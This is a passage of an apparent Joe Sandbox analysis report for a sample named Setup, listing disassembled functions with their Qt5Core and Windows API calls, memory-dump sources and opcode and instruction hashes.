                                                                                                                                                              • Instruction ID: 6ef6b6fc4949b53cad439893e70ad871d3160d2c2e6283e33b91e815f047c9e7
                                                                                                                                                              • Opcode Fuzzy Hash: ae78dabc0ebdf97b5c1d5a509f48ded30bb3be345d363f816b71f371ff68a59b
                                                                                                                                                              • Instruction Fuzzy Hash: 7C115EA2E0EB4281EB919B62F804069A2A1FF89FD1B484031DE5E47B55EF3CD445CF00
                                                                                                                                                              Function 00007FFBA1A01970 Relevance: 10.6, APIs: 7, Instructions: 109registryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ?data@ArrayData@@$?utf16@ChangeCloseCreateEventHandleNotifyOpenString@@Value
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3576225581-0
                                                                                                                                                              • Opcode ID: a89ca7e7a15e8e9282557ab81a2f6f9b35d785e1a909ef6b3852ffd06f4de379
                                                                                                                                                              • Instruction ID: 74cfed789893346ee3afb41458d76ea78e3f11d373a94e4e06003f8f41ea33c4
                                                                                                                                                              • Opcode Fuzzy Hash: a89ca7e7a15e8e9282557ab81a2f6f9b35d785e1a909ef6b3852ffd06f4de379
                                                                                                                                                              • Instruction Fuzzy Hash: 6341D132719A8186D7619B26E5405ADB7A5EBC4F94F18C132CF9E47B14EF3DE8818F00
                                                                                                                                                              Function 00007FFBA1A2A2A0 Relevance: 10.6, APIs: 7, Instructions: 106memoryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?allocate@QArrayData@@SAPEAU1@_K00V?$QFlags@W4AllocationOption@QArrayData@@@@@Z.QT5CORE(?,?,?,?,?,?,?,?,00000000,00007FFBA1A28187), ref: 00007FFBA1A2A2D2
                                                                                                                                                              • ?allocate@QArrayData@@SAPEAU1@_K00V?$QFlags@W4AllocationOption@QArrayData@@@@@Z.QT5CORE(?,?,?,?,?,?,?,?,00000000,00007FFBA1A28187), ref: 00007FFBA1A2A314
                                                                                                                                                              • ?data@QArrayData@@QEBAPEBXXZ.QT5CORE(?,?,?,?,?,?,?,?,00000000,00007FFBA1A28187), ref: 00007FFBA1A2A329
                                                                                                                                                              • ?data@QArrayData@@QEBAPEBXXZ.QT5CORE(?,?,?,?,?,?,?,?,00000000,00007FFBA1A28187), ref: 00007FFBA1A2A338
                                                                                                                                                              • ?data@QArrayData@@QEBAPEBXXZ.QT5CORE(?,?,?,?,?,?,?,?,00000000,00007FFBA1A28187), ref: 00007FFBA1A2A349
                                                                                                                                                              • ?deallocate@QArrayData@@SAXPEAU1@_K1@Z.QT5CORE(?,?,?,?,?,?,?,?,00000000,00007FFBA1A28187), ref: 00007FFBA1A2A3DF
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Array$Data@@$?data@U1@_$?allocate@AllocationData@@@@@Flags@Option@$?deallocate@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1657937610-0
                                                                                                                                                              • Opcode ID: 9d2240993d1a4f13598b2cf91bf98e7de54ebe7c6d8ac1ed6e21de846ff22a4b
                                                                                                                                                              • Instruction ID: cee281ee1d5ca19c647343c8fe039ca28627eefcafbecea6e59149f9e612b07d
                                                                                                                                                              • Opcode Fuzzy Hash: 9d2240993d1a4f13598b2cf91bf98e7de54ebe7c6d8ac1ed6e21de846ff22a4b
                                                                                                                                                              • Instruction Fuzzy Hash: CA41B276709A4186D751DF39E48016DB7A1FB89BA4B188232DFAD47BA4DF3DD441CB00
                                                                                                                                                              Function 00007FFBA19844D0 Relevance: 10.6, APIs: 7, Instructions: 91COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ??8QUrl@@QEBA_NAEBV0@@Z.QT5CORE(?,?,?,00007FFBA19714D9), ref: 00007FFBA1984505
                                                                                                                                                              • ?size@QListData@@QEBAHXZ.QT5CORE(?,?,?,00007FFBA19714D9), ref: 00007FFBA1984531
                                                                                                                                                              • ?size@QListData@@QEBAHXZ.QT5CORE(?,?,?,00007FFBA19714D9), ref: 00007FFBA198453D
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,00007FFBA19714D9), ref: 00007FFBA198454F
                                                                                                                                                              • ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,00007FFBA19714D9), ref: 00007FFBA198455C
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,00007FFBA19714D9), ref: 00007FFBA1984569
                                                                                                                                                                • Part of subcall function 00007FFBA197B610: ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,00007FFBA1984592,?,?,?,00007FFBA19714D9), ref: 00007FFBA197B625
                                                                                                                                                                • Part of subcall function 00007FFBA197B610: ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,00007FFBA1984592,?,?,?,00007FFBA19714D9), ref: 00007FFBA197B630
                                                                                                                                                                • Part of subcall function 00007FFBA197B610: ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,00007FFBA1984592,?,?,?,00007FFBA19714D9), ref: 00007FFBA197B642
                                                                                                                                                                • Part of subcall function 00007FFBA197B610: ?data@QString@@QEBAPEBVQChar@@XZ.QT5CORE(?,?,?,00007FFBA1984592,?,?,?,00007FFBA19714D9), ref: 00007FFBA197B64E
                                                                                                                                                                • Part of subcall function 00007FFBA197B610: ?data@QString@@QEBAPEBVQChar@@XZ.QT5CORE(?,?,?,00007FFBA1984592,?,?,?,00007FFBA19714D9), ref: 00007FFBA197B65A
                                                                                                                                                              • ??8@YA_NAEBVQString@@0@Z.QT5CORE(?,?,?,00007FFBA19714D9), ref: 00007FFBA19845D1
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ?size@Data@@ListString@@$?begin@?data@Char@@$??8@?end@String@@0@Url@@V0@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2492917683-0
                                                                                                                                                              • Opcode ID: ed0640a5728208cfa156d2f71215590e57fa37a2c266f64f7b01e6e60c8c00d5
                                                                                                                                                              • Instruction ID: f92c73a48e54eb660c2aae05ea3b3e911c14b78979127c6341fb45065b772e38
                                                                                                                                                              • Opcode Fuzzy Hash: ed0640a5728208cfa156d2f71215590e57fa37a2c266f64f7b01e6e60c8c00d5
                                                                                                                                                              • Instruction Fuzzy Hash: 99415DA2A09A4292DF91DF36E5401AD63A1FF51B88B444032DF5E17E91EF3CE49ACB10
                                                                                                                                                              Function 00007FFBA1975150 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 82COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$Variant@@$Latin1String@String@@@
                                                                                                                                                              • String ID: ActiveConfiguration
                                                                                                                                                              • API String ID: 2432152112-2333711730
                                                                                                                                                              • Opcode ID: 204c01ba69b34e6afd63b629deecf088931b663f94db476ffb573a8977c1284a
                                                                                                                                                              • Instruction ID: e4edaa4a74af7c46218295842dc542cd5246223767c0f6a58ec67b95ab22f4ed
                                                                                                                                                              • Opcode Fuzzy Hash: 204c01ba69b34e6afd63b629deecf088931b663f94db476ffb573a8977c1284a
                                                                                                                                                              • Instruction Fuzzy Hash: 97316272609A8286FB91DF25E4402A97360FF84BA8F484131EF9D47A59EF3CD546CF10
                                                                                                                                                              Function 00007FFBA197ABB0 Relevance: 10.6, APIs: 7, Instructions: 78COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00007FFBA197D660: ?lock@QMutex@@QEAAXXZ.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA197ABC6), ref: 00007FFBA197D6A0
                                                                                                                                                                • Part of subcall function 00007FFBA197D660: ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA197ABC6), ref: 00007FFBA197D6C0
                                                                                                                                                                • Part of subcall function 00007FFBA197D660: ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA197ABC6), ref: 00007FFBA197D6D8
                                                                                                                                                                • Part of subcall function 00007FFBA197D660: ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA197ABC6), ref: 00007FFBA197D777
                                                                                                                                                                • Part of subcall function 00007FFBA197D660: ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA197ABC6), ref: 00007FFBA197D785
                                                                                                                                                                • Part of subcall function 00007FFBA1973D20: ??0QByteArray@@QEAA@UQByteArrayDataPtr@@@Z.QT5CORE ref: 00007FFBA1973D56
                                                                                                                                                                • Part of subcall function 00007FFBA1973AE0: ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA1973B1F
                                                                                                                                                                • Part of subcall function 00007FFBA1973AE0: ?detach_grow@QListData@@QEAAPEAUData@1@PEAHH@Z.QT5CORE ref: 00007FFBA1973B36
                                                                                                                                                                • Part of subcall function 00007FFBA1973AE0: ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA1973B42
                                                                                                                                                                • Part of subcall function 00007FFBA1973AE0: ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA1973B54
                                                                                                                                                                • Part of subcall function 00007FFBA1973AE0: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FFBA1973B77
                                                                                                                                                                • Part of subcall function 00007FFBA1973AE0: ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA1973B92
                                                                                                                                                                • Part of subcall function 00007FFBA1973AE0: ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA1973B9E
                                                                                                                                                                • Part of subcall function 00007FFBA1973AE0: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FFBA1973BC6
                                                                                                                                                                • Part of subcall function 00007FFBA1973AE0: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFBA1973C27
                                                                                                                                                                • Part of subcall function 00007FFBA1973AE0: ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE ref: 00007FFBA1973C35
                                                                                                                                                                • Part of subcall function 00007FFBA1973AE0: ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA1973C3E
                                                                                                                                                                • Part of subcall function 00007FFBA1973AE0: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FFBA1973C50
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1979AD9), ref: 00007FFBA197ABEA
                                                                                                                                                              • _Init_thread_footer.LIBCMT ref: 00007FFBA197AC78
                                                                                                                                                                • Part of subcall function 00007FFBA1A562A0: EnterCriticalSection.KERNEL32(?,?,?,00007FFBA1A1EA6A,?,?,?,00007FFBA1A36395), ref: 00007FFBA1A562B0
                                                                                                                                                                • Part of subcall function 00007FFBA1A562A0: LeaveCriticalSection.KERNEL32(?,?,?,00007FFBA1A1EA6A,?,?,?,00007FFBA1A36395), ref: 00007FFBA1A562F0
                                                                                                                                                              • ??0QByteArray@@QEAA@UQByteArrayDataPtr@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1979AD9), ref: 00007FFBA197AC89
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1979AD9), ref: 00007FFBA197ACA1
                                                                                                                                                                • Part of subcall function 00007FFBA1A56300: EnterCriticalSection.KERNEL32(?,?,?,00007FFBA1A1EA32,?,?,?,00007FFBA1A36395), ref: 00007FFBA1A56310
                                                                                                                                                              • _Init_thread_footer.LIBCMT ref: 00007FFBA197AD1F
                                                                                                                                                              • ??0QByteArray@@QEAA@UQByteArrayDataPtr@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1979AD9), ref: 00007FFBA197AD30
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1979AD9), ref: 00007FFBA197AD48
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$Byte$?begin@Array@@$String@@$ArrayCriticalDataPtr@@@SectionV0@@$?dispose@?end@Data@1@@EnterInit_thread_footer$?detach_grow@?lock@Data@1@LeaveMutex@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 868051027-0
                                                                                                                                                              • Opcode ID: d071dbf924aed4100ed30baeedde15ab8a0ec9740476aae4e5032c2287e5c2a6
                                                                                                                                                              • Instruction ID: a6036032bd1f0dc950eea5aaeb06f75f5b9c1464c768a8939f1403dc3efd60df
                                                                                                                                                              • Opcode Fuzzy Hash: d071dbf924aed4100ed30baeedde15ab8a0ec9740476aae4e5032c2287e5c2a6
                                                                                                                                                              • Instruction Fuzzy Hash: D6410CA592EA8691EB82DF34E8402B53320FF44765F809132DD6E472A2EF3CE845CF14
                                                                                                                                                              Function 00007FFBA197D880 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 76COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?createShared@QNonContiguousByteDeviceFactory@@SA?AV?$QSharedPointer@VQNonContiguousByteDevice@@@@V?$QSharedPointer@VQRingBuffer@@@@@Z.QT5CORE ref: 00007FFBA197D8E2
                                                                                                                                                              • ?createShared@QNonContiguousByteDeviceFactory@@SA?AV?$QSharedPointer@VQNonContiguousByteDevice@@@@PEAVQIODevice@@@Z.QT5CORE ref: 00007FFBA197D913
                                                                                                                                                              • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE ref: 00007FFBA197D984
                                                                                                                                                              • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FFBA197D98F
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ByteContiguous$Object@@Pointer@Shared$?createConnection@DeviceDevice@@@@Factory@@MetaShared@$?connect@Buffer@@@@@ConnectionDevice@@@Qt@@@RingType@
                                                                                                                                                              • String ID: 1emitReplyUploadProgress(qint64,qint64)$2readProgress(qint64,qint64)
                                                                                                                                                              • API String ID: 3896897096-2170191149
                                                                                                                                                              • Opcode ID: b9031a44c94af3df9072fbd3d8a742f508e88202eab4e2e2363770a99b9a3247
                                                                                                                                                              • Instruction ID: cb373f2bf4421fca16f44f40afb5ed175b64ceb5c6cc7893c4d09212a73bf7ed
                                                                                                                                                              • Opcode Fuzzy Hash: b9031a44c94af3df9072fbd3d8a742f508e88202eab4e2e2363770a99b9a3247
                                                                                                                                                              • Instruction Fuzzy Hash: 2731C8B260AB4282EB91CF26E4402AA73E1FB85BA4F484032DE5E47754DF3CD546CF40
                                                                                                                                                              Function 00007FFBA1A21AC0 Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?size@QListData@@QEBAHXZ.QT5CORE(?,?,?,00007FFBA1A21C29,?,?,?,?,?,?,00007FFBA1971519), ref: 00007FFBA1A21AEF
                                                                                                                                                              • ?size@QListData@@QEBAHXZ.QT5CORE(?,?,?,00007FFBA1A21C29,?,?,?,?,?,?,00007FFBA1971519), ref: 00007FFBA1A21AFA
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ?size@Data@@List
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 192315772-0
                                                                                                                                                              • Opcode ID: 2c89132d27d0c9bbcbd6bfa08c23af230b7ddfd09452e877cfcab4d30f518ea1
                                                                                                                                                              • Instruction ID: 774bf0e65c477d6188a1922f6e787b249cbb5913554fceb4e1924a3aec8d441b
                                                                                                                                                              • Opcode Fuzzy Hash: 2c89132d27d0c9bbcbd6bfa08c23af230b7ddfd09452e877cfcab4d30f518ea1
                                                                                                                                                              • Instruction Fuzzy Hash: C9217FA1A0A64242DF928B32EA4407993A1AF55BD4F085032DE6E07B65FE3CE4469F00
                                                                                                                                                              Function 00007FFBA1974540 Relevance: 10.6, APIs: 7, Instructions: 73timeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00007FFBA1A55CBC: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFBA19730E8), ref: 00007FFBA1A55CD6
                                                                                                                                                              • ??0QBasicTimer@@QEAA@XZ.QT5CORE ref: 00007FFBA1A216FD
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE ref: 00007FFBA1A21708
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FFBA1A21722
                                                                                                                                                              • ?sharedNull@QArrayData@@SAPEAU1@XZ.QT5CORE ref: 00007FFBA1A2178B
                                                                                                                                                                • Part of subcall function 00007FFBA1A24150: ??0QBasicTimer@@QEAA@XZ.QT5CORE(?,?,00000000,00007FFBA1A280CA,?,?,?,00007FFBA1A28A35,?,?,?,?,00007FFBA1A2C525,?,?,00000000), ref: 00007FFBA1A2416D
                                                                                                                                                                • Part of subcall function 00007FFBA1A24150: ??0QString@@QEAA@XZ.QT5CORE(?,?,00000000,00007FFBA1A280CA,?,?,?,00007FFBA1A28A35,?,?,?,?,00007FFBA1A2C525,?,?,00000000), ref: 00007FFBA1A2417E
                                                                                                                                                                • Part of subcall function 00007FFBA1A24150: ??0QByteArray@@QEAA@PEBDH@Z.QT5CORE(?,?,00000000,00007FFBA1A280CA,?,?,?,00007FFBA1A28A35,?,?,?,?,00007FFBA1A2C525,?,?,00000000), ref: 00007FFBA1A241A2
                                                                                                                                                                • Part of subcall function 00007FFBA1A24150: ?fromBase64@QByteArray@@SA?AV1@AEBV1@@Z.QT5CORE(?,?,00000000,00007FFBA1A280CA,?,?,?,00007FFBA1A28A35,?,?,?,?,00007FFBA1A2C525,?,?,00000000), ref: 00007FFBA1A241B0
                                                                                                                                                                • Part of subcall function 00007FFBA1A24150: ??4QDateTime@@QEAAAEAV0@$$QEAV0@@Z.QT5CORE(?,?,00000000,00007FFBA1A280CA,?,?,?,00007FFBA1A28A35,?,?,?,?,00007FFBA1A2C525,?,?,00000000), ref: 00007FFBA1A241C0
                                                                                                                                                                • Part of subcall function 00007FFBA1A24150: ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,00000000,00007FFBA1A280CA,?,?,?,00007FFBA1A28A35,?,?,?,?,00007FFBA1A2C525,?,?,00000000), ref: 00007FFBA1A241CB
                                                                                                                                                                • Part of subcall function 00007FFBA1A24150: ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,00000000,00007FFBA1A280CA,?,?,?,00007FFBA1A28A35,?,?,?,?,00007FFBA1A2C525,?,?,00000000), ref: 00007FFBA1A241D6
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE ref: 00007FFBA1A217AD
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE ref: 00007FFBA1A217D0
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE ref: 00007FFBA1A217EB
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Array@@ByteString@@$BasicTimer@@$?from?sharedArrayBase64@Data@@DateNull@Time@@V0@$$V0@@V1@@malloc
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2645529683-0
                                                                                                                                                              • Opcode ID: 4e2204d4776cb8f05e5528f49eda8f0d072d49ecb7cb717a9a54508cc27fd777
                                                                                                                                                              • Instruction ID: d5e42c83c8799d108df48fd5e0b205f2578167e93fb03129d17e6f3dd646ecab
                                                                                                                                                              • Opcode Fuzzy Hash: 4e2204d4776cb8f05e5528f49eda8f0d072d49ecb7cb717a9a54508cc27fd777
                                                                                                                                                              • Instruction Fuzzy Hash: 4631FAB2A1AB4685DB819F35E8543A833A0FB44B68F444136DE6E477A9EF3CD448CF40
                                                                                                                                                              Function 00007FFBA19CA8C0 Relevance: 10.6, APIs: 7, Instructions: 62COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$BasicMutex@@Object@@Timer@@Url@@V0@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3637544855-0
                                                                                                                                                              • Opcode ID: c04b2e8455bb8008d29c7b3c6e1750352162103cced9b0fb7cceb4a00b0194ce
                                                                                                                                                              • Instruction ID: e5a9817acc47cf70444772ca9b7cd432f9fa74ee5eb263eb21bfc0601781b863
